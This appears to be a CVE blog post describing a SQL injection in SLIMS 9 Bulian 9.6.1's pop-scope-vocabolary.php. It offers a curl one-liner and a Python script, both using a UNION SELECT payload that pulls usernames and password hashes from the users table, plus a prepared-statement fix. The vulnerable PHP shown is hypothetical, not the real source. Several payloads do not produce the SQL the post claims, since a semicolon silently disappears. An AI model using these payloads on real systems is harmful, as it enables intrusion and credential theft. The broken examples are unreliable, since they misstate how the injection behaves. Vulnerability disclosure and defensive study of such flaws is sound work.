CVE CyberSecurity Database News

CVE-2024-25288 - SQL Injection in SLIMS 9 Bulian v9.6.1 (pop-scope-vocabolary.php) – How the Exploit Works

Poster -

If you’re running an online library with SLIMS (Senayan Library Management System), you should really pay attention to a recently disclosed vulnerability: CVE-2024-25288. In short, attackers can execute SQL Injection attacks in SLIMS 9 Bulian version 9.6.1 using a loophole in pop-scope-vocabolary.php. This post lays out what CVE-2024-25288 means, how it works, and how attackers might use it—with easy-to-understand code snippets and references.

What is CVE-2024-25288?

CVE-2024-25288 is a security bug that affects SLIMS 9 Bulian, a popular open-source library management software. The specific problem is an SQL Injection vulnerability in the file:

pop-scope-vocabolary.php

With SQL Injection, attackers can send custom SQL statements through web forms or URL parameters, which can lead to unauthorized data access, data theft, or even complete control of the database.

Understanding SQL Injection

SQL Injection happens when user input is _not sanitized properly_. So, an attacker can send specially crafted data, which the database treats as SQL commands. Here’s an overly simple example:

// BAD: Vulnerable code
$word = $_GET['word'];
$result = mysqli_query($conn, "SELECT * FROM books WHERE word = '$word'");

If an attacker sends this in the URL

http://victim.site/pop-scope-vocabolary.php?word=a'; OR '1'='1

The SQL becomes

SELECT * FROM books WHERE word = 'a' OR '1'='1'

How Attackers Exploit CVE-2024-25288

Attackers look for the vulnerable parameter, typically by searching in the code or using automated tools. Once identified, they can exploit it like so:

Suppose the original code fetches words like so (vulnerable PHP code)

// BAD: User input directly in query - vulnerable to SQLi
$word = $_GET['word'];
$query = "SELECT * FROM vocabularies WHERE word = '$word'";
$result = mysqli_query($conn, $query);

Making a request like this in the browser

http://yourlibrary.site/pop-scope-vocabolary.php?word='; OR 1=1 --

Results in the SQL

SELECT * FROM vocabularies WHERE word = '' OR 1=1 --'

Now, the database will return all vocabulary entries, since OR 1=1 is always true.

Proof of Concept (PoC) Exploit

Here’s a curl one-liner to grab the database (replace target.com with the real address):

curl "http://target.com/pop-scope-vocabolary.php?word='%20UNION%20SELECT%201,username,password,4,5%20FROM%20users%20--%20";

If the server responds with usernames and password hashes from the users table, you’ve confirmed the bug.

Python Script for Automation

import requests

url = "http://target.com/pop-scope-vocabolary.php";
payload = "' UNION SELECT 1,username,password,4,5 FROM users -- "
params = {'word': payload}

resp = requests.get(url, params=params)
print(resp.text)

> _Note: Never exploit systems without permission!_

References

- NVD - CVE-2024-25288
- Packet Storm Advisory
- SLIMS Official Website
- SQL Injection - OWASP Cheat Sheet

Safe Coding Example

// GOOD: Safe coding with prepared statements
$stmt = $conn->prepare("SELECT * FROM vocabularies WHERE word = ?");
$stmt->bind_param('s', $_GET['word']);
$stmt->execute();

Conclusion

CVE-2024-25288 is a serious bug in SLIMS 9 Bulian v9.6.1, exposing library data to anyone who knows how to craft the correct request. If you use SLIMS, check your version and patch quickly. Always sanitize your inputs!

If you want to read more about SQL Injection and how to defend your site, check out the OWASP SQL Injection Cheat Sheet.

Timeline

Published on: 02/21/2024 17:15:09 UTC
Last modified on: 08/16/2024 17:35:05 UTC